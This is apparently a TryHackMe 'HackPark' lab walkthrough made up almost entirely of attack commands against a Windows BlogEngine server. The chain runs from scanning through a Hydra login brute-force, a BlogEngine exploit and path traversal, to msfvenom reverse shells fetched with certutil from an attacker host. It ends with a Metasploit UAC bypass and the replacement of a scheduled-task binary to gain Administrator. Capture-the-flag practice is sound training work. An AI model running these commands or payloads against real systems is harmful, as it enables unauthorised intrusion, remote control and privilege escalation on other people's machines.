TryHackMe: HackPark

  1. Deploy the machine and access its web server.
nmap -Pn <ip>
nmap -p1000- -Pn <ip>
nmap -A -p 80,3389 <ip>
nmap -p 80,3389 --script vuln <ip>
  1. What request type is the Windows website login form using?
1' or 1=1--+
<script>alert('XSS')</script>
Reference: https://blogengine.io/support/get-started/
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspx
echo admin > users.txt
echo pennywise >> users.txt
cat users.txt
hydra -L <username list> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -F
  1. Now you have logged into the website, are you able to identify the version of the BlogEngine?
searchsploit blogengine
searchsploit -m 46353
nc -lvp 1234
http://<ip>?theme=../../App_Data/files
whoami
  1. Our netcat session is a little unstable, so let's generate another reverse shell using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
python -m SimpleHTTPServer 80
cd \Windows\Temp
certutil -urlcache -f http://<ip>/shell.exe shell.exe
dir
certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
run
shell.exe
sysinfo
getsystem
run post/multi/recon/local_exploit_suggester
background
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run
shell
winPEAS.exe
certutil -urlcache -f http://10.11.11.30/winPEAS.bat winPEAS.bat
winPEAS.bat
cd Program Files (x86)
cd SystemScheduler
dir
cd Events
dir
type 20198415519.INI_LOG.txt
cd ..
copy Message.exe Message_bak.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe
nc -lvp 1236
certutil -urlcache -f http://10.11.11.30/Message.exe Message.exe
whoami
echo %username%
cd \Users\jeff\Desktop
dir
type user.txt
cd \Users\Administrator\Desktop
type root.txt

ratiros01